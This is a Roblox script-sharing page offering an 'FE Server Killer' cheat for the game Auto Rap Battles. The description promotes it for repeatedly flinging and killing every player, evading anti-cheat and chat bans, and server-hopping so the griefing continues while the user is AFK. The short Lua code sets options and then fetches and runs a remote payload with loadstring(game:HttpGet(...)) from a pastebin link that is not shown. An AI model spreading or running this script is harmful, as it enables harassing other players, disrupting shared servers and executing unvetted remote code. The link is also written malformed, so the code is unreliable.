ADVERTISEMENTREMOVE ADS
FE Server Killer (Put in execute)
57,236 views
Script Preview
Description
This script will mass kill everyone in auto rap battles over & over again, so if you want to annoy people while afk or sleeping you can use this script, keep in mind this must be in autoexecute as it doesn't reload when the script server hops you. To disable it you can just move it out of autoexecute.
This script works in any game that has collisions enabled, keep in mind that this should only be used in games that have less than 20 players, if you want to destroy a game with more than 20 players make sure to bring in some alts and they'll fling the other players automatically.
Features:
- auto fling all
- spam chat bypass
- auto server hop
- auto server killer
- anti chat ban
- anti cheat bypass
- auto rap battles killer
ADVERTISEMENTREMOVE ADS
14 Lines • 1.04 KiB
Verified
_G.ProtectedPeople = {
}; -- Add your accounts here so they won't be flung by the bots
_G.AutoServerHop = true; -- Keep this enable so it automatically swittches you to a new server when the server is low.
_G.ServerHopThresshold = 0.5; -- This would mean if auto rap battles had less than 9 players the script would server hop. | The number mut be within [0, 1] boundaries, do not increase the script higher than 1 or lower than 0. (I don't recommend setting this to 1.0 as it'll make you rapidly server hop, I recommend doing 0.5 which will teleport you to a new server after half the server has left)
_G.AutoServerHopIn = 5; -- This makes you auto server hop every 5 minutes just in case you don't want to be in the same server each time.
_G.AntiAfkScript = true; -- Prevents roblox from kicking you from being afk
if (game.PlaceId == 579955134) then
game.Workspace.Spectating:FireServer(); -- Disables spectating so the game doesn't respwan you in auto rap battles
end
loadstring(game:HttpGet('https:/pastebin.ai/raw/a0gitsoenc'))();
ADVERTISEMENTREMOVE ADS
ADVERTISEMENTREMOVE ADS






Comments